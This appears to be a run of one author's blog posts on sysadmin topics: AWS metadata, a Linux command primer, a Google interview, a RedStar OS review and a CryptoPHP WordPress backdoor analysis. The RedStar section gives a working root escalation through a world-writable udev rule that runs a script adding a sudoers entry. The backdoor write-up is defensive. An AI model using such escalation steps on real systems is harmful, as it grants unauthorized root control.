When working with AWS EC2, it’s often handy to be able to reference certain information about an instance. The obvious solution is the AWS Metadata service, accessible with a simple cURL command. For example, to get the private IP address of an instance:
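The example alluded to looks like this (169.254.169.254 is the standard EC2 instance-metadata endpoint; the fallback echo is mine, so the snippet degrades gracefully when run off-instance):

```shell
# The metadata service is only reachable from inside an EC2 instance;
# the fallback keeps this runnable anywhere
curl -s --max-time 2 http://169.254.169.254/latest/meta-data/local-ipv4 \
  || echo "not running on EC2"
```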
Since I hate writing boilerplate code and don’t want to make an HTTP request each time I want to know something about my environment, I put together a Docker image that fetches most of the available metadata and outputs environment variable settings. (Also, I’ve been itching to write something in Go.)
My primary use case is to create /etc/aws.env when a new CoreOS instance starts, but this should work on any system with systemd. To do this, aws-env.service should be installed and configured to run at startup. One way to do this is via cloud-config (EC2 User Data):
- name: aws-env.service
# Contents from 'aws-env.service' go here
An error occurred (ValidationError) when calling the PutLifecycleHook operation: Unable to publish test message to notification target arn:aws:sqs:us-west-2:123456:my-sqs-queue.fifo using IAM role arn:aws:iam:1234:role/my-asg-role. Please check your target and role configuration and try to put lifecycle hook again.
All of the search results for that error turned up solutions involving incorrect IAM policies. This should not be the case if you simply add the AutoScalingNotificationAccessRole per the instructions. For reference, the correct settings are below.
In my case, however, it turns out that AutoScaling can’t publish to a FIFO queue. Recreating the queue as a standard queue fixed this problem for me.
If you’ve installed Shiny Server Pro as a user other than shiny, you might have experienced difficulty adding R packages. This is because Shiny Server Pro runs R as the shiny user, and running R -e "install.packages('foo')" as another user will install packages only to that user’s personal library.
The solution to this is to su to the shiny user:
su - shiny
R -e "install.packages('foo', repos='http://cran.rstudio.com')"
Alternatively, this script will parse an R file looking for require statements and install the necessary packages. It isn’t very smart, so be careful.
This post provides examples of everyday Linux commands. I wrote this as a quick orientation to the CLI for newcomers. Keep in mind that there are usually several ways to accomplish a task, and other command combinations or programs might be better suited to your needs. Don’t be afraid to google it.
Get Help With Commands By Using MAN
The examples on this page represent a small fraction of the possible uses for each command. Many commands have tons of flags and arguments that allow them to adapt to many scenarios. Since it’s impossible to remember how each program works, its arguments, etc., most come with a manual page, or man page. The man command retrieves the manual for the program and displays it on the screen. While sometimes verbose, man pages are typically your best source of initial information. This is the Manual in “RTFM”.
The man system has several numbered sections, each providing documentation on a specific aspect of the program:
1. Executable programs and shell commands
2. System calls
3. Library functions (particularly the C standard library)
4. Special files and drivers (typically in /dev)
5. File formats and conventions
6. Games and screensavers
7. Miscellaneous
8. System administration commands and daemons
Typing man <command> will generally display the section 1 page, if it exists. For names that exist only in other sections (the C function pthread_join, for example), man falls back to the first section that has a page; pthread_join displays page 3. To view a specific section, type man <section> <command>. Note that not all programs have manual pages, and of those that do, most don’t have pages in every section. On some systems, you can type man <section> and press TAB to view a list of pages available for that section.
To view the manual page for man itself, type man man.
Finding the right Linux command with apropos
The Unix tools philosophy favors tools that serve a specific purpose and can be chained together, which results in a seemingly endless variety of ways to accomplish the same job. The apropos command will search the manual pages for a term and return a list of possible commands. This “search” feature isn’t full-featured and works mostly on keyword matching. For example, apropos ftp returns:
apt-ftparchive (1) - Utility to generate index files
ftp (1) - Internet file transfer program
netkit-ftp (1) - Internet file transfer program
netrc (5) - user configuration for ftp
pam_ftp (8) - PAM module for anonymous access module
pftp (1) - Internet file transfer program
sftp (1) - secure file transfer program
smbclient (1) - ftp-like client to access SMB/CIFS resources on servers
Sometimes the number of results can be unwieldy (try “apropos user” or “apropos ip”). Since the apropos command doesn’t do well with multi-word terms like “add user” or “ftp upload”, it’s often useful to filter the output with grep. You can also pipe the output to more or less.
apropos user | grep add
adduser.conf (5) - configuration file for adduser(8) and addgroup(8) .
addgroup (8) - add a user or group to the system
adduser (8) - add a user or group to the system
pam_issue (8) - PAM module to add issue file to user prompt
useradd (8) - create a new user or update default new user information
List directories with ls
ls is the command for listing a directory. Useful flags include:
-a (--all), which shows dotfiles
-l, which provides a long listing that includes file size, permissions, and type
-h (--human-readable), which shows file sizes in normal units instead of bytes (1.23 GB instead of 1234921293)
-S, to sort by file size
A default ll command, plus human-readable sizes:
alias ll="ls -alh"
List all tar files in the current directory:
ls *.tar
List tar files in long format:
ls -l *.tar
List the largest 10 files in a directory and output sizes in human-readable form:
ls -lhS | head -n 10
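To see -S and -h in action, you can build a quick demo directory (file names here are invented for the demo):

```shell
# Create two files of different sizes in a scratch directory
mkdir -p /tmp/ls-demo && cd /tmp/ls-demo
head -c 100000 /dev/zero > big.dat
head -c 10 /dev/zero > small.dat

# Largest files first, with human-readable sizes
ls -lhS
```

big.dat will appear before small.dat in the listing.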
Navigate the filesystem with CD and MC
Navigating around the filesystem is done with the change directory (cd) command. Instead of merely listing the contents of the /tmp directory (ls -l /tmp), you can move into the /tmp directory and list the contents of the current directory:
cd /tmp && ls -l
To return to your home directory, simply type cd with no arguments. You can also use the shortcut ~ to refer to files under your home directory. The two paths below describe the same location on the filesystem, assuming that the second is used by the cmattoon user.
/home/cmattoon/Documents
~/Documents
If you aren’t sure which directory you’re in, you can use the pwd (Present Working Directory) command to tell you.
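Putting cd and pwd together (using a throwaway directory):

```shell
mkdir -p /tmp/cd-demo   # create a scratch directory
cd /tmp/cd-demo         # move into it
pwd                     # print the directory we are now in
```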
Midnight Commander (mc) is a third-party application that some people find useful for navigating the filesystem, copying and moving files, etc. You can find more information on their site.
Move, Rename and Copy files with mv and cp
Copy a config file to a backup:
cp config.ini config.ini.bak
Copy the entire config directory and its contents:
cp -r config/ config-backup
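mv handles both moving and renaming; for example (file names invented for the demo):

```shell
cd /tmp
touch report-draft.txt

# "Rename" is just a move to a new name
mv report-draft.txt report-final.txt

# Move the file into another directory
mkdir -p archive
mv report-final.txt archive/
```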
Remove files with rm and shred
The rm command removes files basically forever, so be careful.
There is no “undo” command for rm. Some people choose to edit their ~/.bashrc or ~/.bash_aliases and add the following:
alias rm="rm -i" # Ask for confirmation before deleting files.
Linux makes the process of deleting a file forever deceptively simple:
rm file.txt
To indiscriminately remove everything in the “/tmp” directory:
rm -rf /tmp/*
Note: Either "rm -rf /tmp/" or "rm -rf /tmp" would delete the /tmp directory itself.
To remove a file whose name contains spaces, escape each space with a backslash:
rm My\ Document
For private information, you might consider using shred.
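shred overwrites a file’s contents before (optionally) removing it; a quick sketch (file name invented for the demo):

```shell
cd /tmp
printf 'secret data\n' > secrets.txt

# Overwrite the contents several times, then truncate and remove the file (-u)
shred -u secrets.txt
```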
Read large files one screen at a time with more and less
more and less are two programs that filter text output. They’re commonly used to page through large files, but can also be used to buffer output from other programs. It’s a helpful habit to read config files with more or less rather than opening them in a text editor. In both programs, you can find help by pressing h and exit by pressing q.
cat README.md | less
Page through the output of an install script, including anything written to stderr:
./install.sh 2>&1 | less
Although both programs are very similar, less is the newer one with more features. Specifically, less allows forward and backward navigation (via the arrow keys and PgUp/PgDn) and doesn’t have to read the entire file into memory. This makes it more efficient on large files than its predecessor, more.
Use the slash key (/) to begin a search. While a search is in progress, the “n” key will move to the next result.
Download files with curl and wget
Since both curl and wget support HTTP/HTTPS and FTP, they are especially useful for interacting with web-based services like APIs and HTML forms. Both programs use the HTTP GET method by default, but are capable of others as well (POST, HEAD, PUT, etc.), and both support SSL. cURL supports even more protocols, including Telnet, SCP, SFTP, POP3, IMAP, SMTP and LDAP, plus a number of other features.
Generally speaking, I prefer wget for downloading files and cURL for interacting with APIs and other web services.
Note: Ubuntu comes with wget, but you’ll need to install curl. CentOS and OS X are the opposite. Either way, you’ll probably need to install one or the other.
To download a file with wget:
wget http://example.com/file.tar.gz
If the URL contains special characters, or is pointing to a script, it’s sometimes better to wrap the URL in quotes and use the -O flag to specify an output file.
If you still want to see error output, but no progress bar, you can use -sS in curl. The lowercase -s is for silent mode, the uppercase -S for “show errors”.
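To try those flags without touching the network, you can point curl at a local file:// URL (file names here are invented for the demo):

```shell
# A local file:// URL stands in for a remote one so this runs anywhere
printf 'hello\n' > /tmp/curl-demo-src.txt

# -s hides the progress bar, -S still shows errors, -o names the output file
curl -sS -o /tmp/curl-demo-out.txt "file:///tmp/curl-demo-src.txt"
cat /tmp/curl-demo-out.txt
```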
For more details, type “man wget” or “man curl”.
Check disk usage with du and df
To check the amount of disk space available, use the df command (think “disk free space”). The du command will show you the amount of disk space used in the specified directory. Like the ls command, both df and du can output the human-readable filesize by using the -h flag.
Output of df -h will show the disk space for all mounted drives by default:
To see how much space the current directory is taking up, use du -sh. The -s flag means “summary”, and prints the total usage including all subdirectories. Without the -s flag, du will generate a report for each subdirectory. This feature can be useful for finding the largest n subdirectories. The following command finds the 10 largest subdirectories of the current directory. By piping the output of du into sort (-h, sort by human-readable filesize; -r, reverse), we can sort the entries from largest to smallest. That output is then piped into head to retrieve the top 10 only.
du -h . | sort -rh | head
Of course, you could pipe this output to more or less and peruse the entire list of directories, but there’s already a better tool for this: ncdu. (The “nc” alludes to the ncurses library used to render the user interface.) As you can see in the screenshot below, ncdu provides an easy way of tracking down large files.
Get file contents with cat and strings
The cat and strings commands are used to write file contents to stdout. The cat command will dump the raw file contents (in whatever form), while strings will print only printable characters. This feature makes the strings command a useful choice in identifying a file format or other initial discovery tasks.
Print the raw binary data of /bin/true to stdout:
cat /bin/true
See all human-readable strings in the “true” binary:
strings /bin/true
Zero a file with cat:
cat /dev/null > README.md
Find what you’re looking for with grep and find
Grep (Globally search a Regular Expression and Print) is useful for finding strings in files (or stdout). The find utility is used for searching by file name, size, etc.
To find all PHP files with the string “@todo” (case insensitive) in the src/ directory:
grep -i "@todo" src/*.php
Recursively search the src/ directory for files containing the string “@todo” (case-insensitive):
grep -ri "@todo" src/
This uses the -r (--recursive) and -i (--ignore-case) flags. As you may suspect, the --recursive flag searches the directory recursively, while the --ignore-case flag ignores the difference between uppercase and lowercase characters.
Grep is also useful to filter output from commands or stdout:
If the match is part of multi-line output, grep will cut off all but the matching line. If you want to see lines on either side of the target line, use the -A (--after-context) or -B (--before-context) flags. For example, consider grepme.txt, a file with “This is Line #n” for n from 0 to 30. Both commands produce the same output:
grep 20 grepme.txt -A 5 -B 3
cat grepme.txt | grep "20" -A 5 -B 3
This is Line #17
This is Line #18
This is Line #19
This is Line #20
This is Line #21
This is Line #22
This is Line #23
This is Line #24
This is Line #25
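The example above can be reproduced like so (written to /tmp to keep things tidy):

```shell
# Generate grepme.txt with "This is Line #n" for n = 0..30
for i in $(seq 0 30); do echo "This is Line #$i"; done > /tmp/grepme.txt

# Show the match plus three lines before and five lines after
grep 20 /tmp/grepme.txt -A 5 -B 3
```

The output runs from "This is Line #17" through "This is Line #25".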
Other useful flags include -v, which inverts the match, and -l/-L, which print the names of files containing matches (or, for -L, files without matches) instead of the matching lines themselves.
Show all lines in an access log that don’t include “GoogleBot”:
grep -v "GoogleBot" access.log
I interviewed at Google Pittsburgh a while back (as a result of Google FooBar), and while I signed an NDA regarding the interview questions, I can provide a brief overview of the process. Ultimately, I did not receive an offer, so take this for what it’s worth.
Google will email you some official interview preparation materials, which you should obviously review. They outline the process very thoroughly, as well as provide an outline of possible material. If you’ve prepared for technical interviews before, much of this content is not a surprise, but it would be foolish not to review everything they’ve sent.
How does their interview process work?
Typically, there are phone interviews, then an on-site interview. I skipped the phone interview stage because of FooBar, and went directly to the on-site interviews.
If you are selected after submitting an application, or re-apply, you’ll be asked to do a phone interview first.
Since I can’t offer guidance here, I’ll refer you to Google’s Interviews page for specific details.
How much time should I allot to studying?
This answer depends on how comfortable you are with your CS fundamentals. Most people dedicate at least a month, possibly more. A recruiter told me they’re not able to schedule interviews greater than 30 days ahead, but you have the option of contacting them later to schedule. From every interaction I’ve had (a couple recruiters, and the engineers on-site), they genuinely want you to be at the top of your game when you come in. Take your time. They’re almost too cool about making sure you’re prepared for the interview process.
The on-site interview can be done over one day or two. I’m not sure what game theory says here, but I went for the one-day interview. This consisted of five interviews, about 45 minutes each. (You’ll also meet up with another engineer for lunch, which isn’t really part of the interview process.) They’ve even put up an example interview on YouTube:
Do not expect them to ask about your past projects, resume, etc. I saw a lot of complaining on glassdoor about this (mostly from people who didn’t get an offer).
They’re less interested in your specific background and accomplishments than in your ability to solve the problems presented, which seems to offend a lot of people. Furthermore, everyone I met was super friendly, except for one interviewer who really didn’t seem interested in stepping away from work to interview someone. I’m told this happens most frequently in phone interviews, though.
Generally speaking, the problems I was presented had a brute-force solution and an elegant solution or two. If you reach a working solution, they’ll likely ask a few cursory questions about Big-O notation or what data structure you’re using, then ask you to iterate on your code to meet additional requirements, consume fewer resources, or otherwise refine your solution. While they might appear to be tricky questions, they’re really not out to get you. The problems are very much in line with the TopCoder Division I problems, and I’m told that being comfortable solving those types of problems correlates with success at Google.
I was able to solve two of the problems relatively easily, had difficulty with the third, and did not reach a working solution for two other problems. You are not necessarily penalized for not reaching a solution, but it obviously helps. I’m told they’re more interested in your thought process and approach than getting a working solution.
Review Comp-sci fundamentals
You should be comfortable discussing the various types of sorting algorithms, BFS/DFS, tree and graph manipulation, etc. You will be expected to talk intelligently about Big-O notation and discuss the running time and space constraints of the algorithms you design. You should be able to digest the problem and find the most appropriate data structure (array, stack, linked list, graph, etc). I did not have any problems that involved crazy complex algorithms or cutting-edge research.
Stacks & Queues
Tree insertion, manipulation, and search
Practice, practice, practice
Commit to doing at least one practice problem each day. You will be expected to do one interview in a compiled language (C++, Java, or Go), but are permitted to do the rest in a common language of your choosing (e.g., Python). I’d venture to guess that nearly all Google engineers are polyglots, and as long as you’re not using Lisp or Prolog or something, you should be fine. Talk with your recruiter, or attend the prep session for answers to specific questions like these.
What Libraries Are Permitted?
Neither I nor my interviewers were aware of a specific list of libraries that are allowed, but I was permitted to use common Python and C++ libraries (bisect, std::vector, etc.), as long as they didn’t solve the problem outright (e.g., Python’s sorted() function). You are not expected to implement everything from scratch either – they want to see modern, idiomatic programming.
Example Google Interview Questions
The internet has some specific interview questions that others have asked, but obviously Google’s engineers aren’t dumb, and Google itself is uniquely aware of what content people are searching for. They routinely change up the questions, and I’m told their validated question pool is large enough that you can’t study for the test. That being said, the questions I’ve seen online accurately reflect the difficulty level of the problems I had, but my problems were 100% unrelated. Be able to apply the basics.
As someone without a CS degree, the questions that I had weren’t entirely outside my grasp. I could almost see the right solution, but wasn’t quite able to implement some of them. More preparation would have definitely helped.
Many of the questions were related to problems I’d solved while practicing. The best I can do in describing them is this: they’re standard comp-sci problems, with a twist. They’re close enough to standard problems that they’ll expect you to use the appropriate algorithms and/or data structures, but modified slightly so that you’ll have to actually understand what’s going on. Rote memorization of quicksort, mergesort, etc. won’t do.
This information can now be used to log in to MySQL’s command-line interface:
mysql -u username -p
Leaving the “-p” parameter empty will cause MySQL to prompt you for a password. On a *NIX server, it will look like you’re not typing anything — this is by design. While you may specify the password on the same line, this can leave your plaintext password in your command history, which is easily readable. If you want to use this format anyway (i.e., in a script), note that you cannot put a space between the “-p” flag and your password:
mysql -u username -ppassword
Once you’ve logged in, you can view available databases with the show databases; command. To use your wordpress database, take the value from DB_NAME (above) and use the use command: use wordpress;. To see available tables in the selected database, run show tables;.
The TrackMan mouse has four physical buttons: a large left and right button (1, 3) that serve as the primary mouse buttons, and two smaller left and right buttons (8, 9) that trigger your browser’s “back” and “forward” actions. To replace that behavior with scrolling, insert the following lines in your ~/.bashrc (or anywhere else that can run a few commands):
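The snippet below is a sketch using the X evdev driver’s wheel-emulation properties; the device name and property names are assumptions you should check against the output of xinput list and xinput list-props on your own system:

```shell
# Find your device name first with: xinput list
DEVICE="Logitech USB Trackball"   # assumption: adjust to match your hardware

# Turn on wheel emulation and bind it to button 8 (the small left button),
# so holding that button while moving the ball scrolls
xinput set-prop "$DEVICE" "Evdev Wheel Emulation" 1
xinput set-prop "$DEVICE" "Evdev Wheel Emulation Button" 8
xinput set-prop "$DEVICE" "Evdev Wheel Emulation Axes" 6 7 4 5
```

These commands require a running X session, so treat them as configuration to adapt rather than something to run verbatim.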
I recently stumbled upon a copy of RedStar OS, which appears to be a RHEL-based server distribution developed by North Korea. Version 2.5 was initially purchased and reviewed by a Russian student studying abroad, and a user by the name of slipstream uploaded version 3.0 (server) to TPB in mid-2014.
Several reports portray it as a tool to monitor web usage by the regime, and while I don’t doubt that, it seems unnecessary to repackage an operating system to do so. It seems more likely that it’s a symbol of sovereignty and independence from Windows (made in USA). Since North Korea’s internet is a giant class A network (10.76.1.0/22), any reporting software would likely try to report to an otherwise “internal” network. For example, the browser packaged with the OS has its homepage set to 10.76.1.11. A quick Wireshark analysis didn’t reveal anything immediately suspicious, but I’ve yet to dig into that fully.
On the surface, it’s a pretty hollow clone of RHEL using KDE desktop. The directory structure is a cross between OSX and *nix, as is the overall feel of the desktop environment.
It comes with a couple of standard applications – a calculator, notepad, contact book, etc. – as well as QuickTime and the Naenera Browser (a Firefox clone). Since Naenera (“my country”) is also the name of the official web portal, and most citizens can’t access the “international internet”, the two might as well be synonymous.
You can see the public-facing Naenera at http://www.naenara.com.kp/en/, but be aware that they’ve been known to inject malware on some of their public-facing sites.
It’s also interesting to note there’s a CHM (compiled HTML) viewer. This is typically used for software documentation, and very well may be the case here. I’d be interested to see if this is utilized for something akin to Cuba’s Paquetes, downloading parts of the Kwangmyong, or something altogether different. (There is an empty “Sites” folder in the user’s home directory)
There’s an OpenOffice clone, called Sogwang Office.
It also has this music composition program, UnBangUI:
The mail program doesn’t have any clear way to add an email account, but does prevent you from checking mail until you’ve added one.
The software center only allows importing from /media. There is a repository of extra applications that’s offered on a second CD (the Russian site says the extra CD costs about twice what the original OS costs), and I haven’t started to dig through that yet.
In the “System Update” area, the Settings dialog shows a location for a URL and proxy, but I’m not sure it’s usable.
Interestingly, the user isn’t added to sudoers and the root account is disabled. Fortunately, this is trivial to bypass, since someone “overlooked” the permissions in /etc/udev/rules.d. If you’re looking for a terminal shortcut, you won’t find it – you’ll have to press Alt+F2, then run konsole to get a shell.
Once you’ve done that, fire up vi and create /tmp/freedom, or whatever you’d like to call it.
Now, open up that file in /etc/udev/rules.d and call /tmp/freedom via a RUN expression:
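As a sketch of those two steps (the sudoers line and the example usernames are my illustration, not copied from the original exploit):

```shell
# 1) The payload: a script that udev will execute as root
cat > /tmp/freedom <<'EOF'
#!/bin/sh
# Grant the desktop user sudo rights (adjust the username to match yours)
echo 'user ALL=(ALL) ALL' >> /etc/sudoers
EOF
chmod +x /tmp/freedom

# 2) The trigger: append a RUN rule to one of the writable files under
#    /etc/udev/rules.d, for example:
#      ACTION=="add", RUN+="/tmp/freedom"
```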
Now that that’s taken care of, you’ll need to refresh the udev rules. In VirtualBox, this worked simply by taking a snapshot, but you might have to reboot.
Enabling English on RedStar OS
Once you’re back up and running, you’ll likely want to enable a language other than Korean. While some reports state that Korean is the only language on the system, this isn’t true; it’s just that Korean is selected by default. Now that you have sudo superpowers, this can be done easily with sed (obviously, for a language other than US English, use the appropriate locale code):
sed -i 's/ko_KP/en_US/g' /etc/sysconfig/i18n
sed -i 's/ko_KP/en_US/g' /usr/share/config/kdeglobals
Log out, and you should see the login screen in English:
That’s it! You should now be able to browse around the OS relatively easily. I’ll post some interesting findings later, once I’ve had an opportunity to dig through it more.
I received this error after making some changes to a Hiera config and the referenced “dev-server” role.
Error: Could not retrieve catalog from remote server: Error 400 on SERVER: Error from DataBinding 'hiera' while looking up 'role::dev-server::use_ssl': undefined method `empty?' for nil:NilClass on node servername.local
Warning: Not using cache on failed catalog
Error: Could not retrieve catalog; skipping run
It turns out this is a vague syntax error. Checking the following has worked for me:
Ensuring the syntax of your Hiera YAML or JSON file is correct. Check for trailing commas in JSON, or misplaced colons. (“foo:bar”, “foo::bar:”, “foo:::bar”, etc.)
The variable name is unique. In one case, “dev-server::use_ssl” was configuring a child resource with the same “use_ssl” property/param/variable.
There are no empty YAML or JSON files in your hieradata directory. I think I’ve had a similar issue with temp files (*~)
If you’ve modified your hiera.yaml to add a new hierarchy or something, restart Puppet.
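For reference, a minimal well-formed hieradata entry for the value from the error above might look like this (the common.yaml file name is an assumption about your hierarchy):

```yaml
# hieradata/common.yaml
role::dev-server::use_ssl: true
```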
This is a series of posts on CryptoPHP, a PHP backdoor used for spamming and blackhat SEO. It seems to come bundled with certain copies of WordPress themes from unofficial sites and resides in a file named “social.png”. It comes installed with a list of email addresses and domains to contact and communicates with a C2 server using cURL and OpenSSL for encryption. Its main purpose appears to be to facilitate the display of links and other content, sent from the C2 server. When the script determines that a web crawler (e.g., GoogleBot), and not a real user, is viewing the site, it injects links to third-party sites in hopes of being indexed.
CryptoPHP communicates with external servers, requiring multiple external requests. You may see the following symptoms:
WordPress is slow to load, especially during the first pageview
Error messages in your server log, possibly due to failed requests.
Error messages from IDS/IPS or other security software (e.g., Suhosin) indicating that someone is making calls to exec and eval.
A few days ago, I noticed that a WordPress installation was running extremely slowly. After enabling xhprof and profiling the index page, I noticed that a single method (RoQfzgyhgTpMgdUIktgNdYvKE) was taking around 160 seconds to run. The method name (others in the stack were similarly named) and the 23 calls to curl_exec came off as immediately suspicious. I used grep to search for the file and found it under the themes folder as images/social.png.
This file was included at the bottom of a theme file, causing it to be executed on each page load.
<?php include_once('images/social.png'); ?>
Opening social.png in a text editor reveals obfuscated and minified code. While it looks like a mess, it’s simply renamed variables and functions with whitespace removed, and can be undone rather easily with the “Find/Replace All” feature of your favorite text editor.
How to Remove CryptoPHP or social.png
In the limited tests that I’ve done, the offending file – social.png – is the only file that is malicious. It seems to be added to the images/ directory in themes downloaded from unofficial sources. Another line in the main theme files (index.php, header.php or footer.php) includes the file.
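To check an install for both the file and the line that includes it, find and grep do the job. Here is a sketch using a throwaway directory that stands in for a WordPress document root (theme and file names invented for the demo):

```shell
# Stand-in for a WordPress document root (demo only)
mkdir -p /tmp/wp-demo/wp-content/themes/some-theme/images
touch /tmp/wp-demo/wp-content/themes/some-theme/images/social.png
echo "<?php include_once('images/social.png'); ?>" > /tmp/wp-demo/wp-content/themes/some-theme/footer.php

cd /tmp/wp-demo

# Locate any copy of the file itself
find wp-content/themes/ -name "social.png"

# Locate the theme file that includes it
grep -rn "social.png" wp-content/themes/
```

Run the same find and grep commands from your real document root.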
While nothing in the file itself indicates that personal or sensitive data is being transmitted back to the server, the file allows its controllers to send commands to it. These commands are then executed by the eval and exec commands in PHP. It is theoretically possible for content, account information, etc. to be transmitted back to the controlling server.
Since the WordPress instance I was using was running on localhost, it would have been unreachable by the controlling servers. It could still phone home and download commands, but could not be controlled directly. However, due to the possibility of sensitive data being stolen, and the evidence of storing information in the database, I’d recommend a complete re-install of WordPress and changing your admin password(s).
Encryption methods (including a script to decrypt database contents)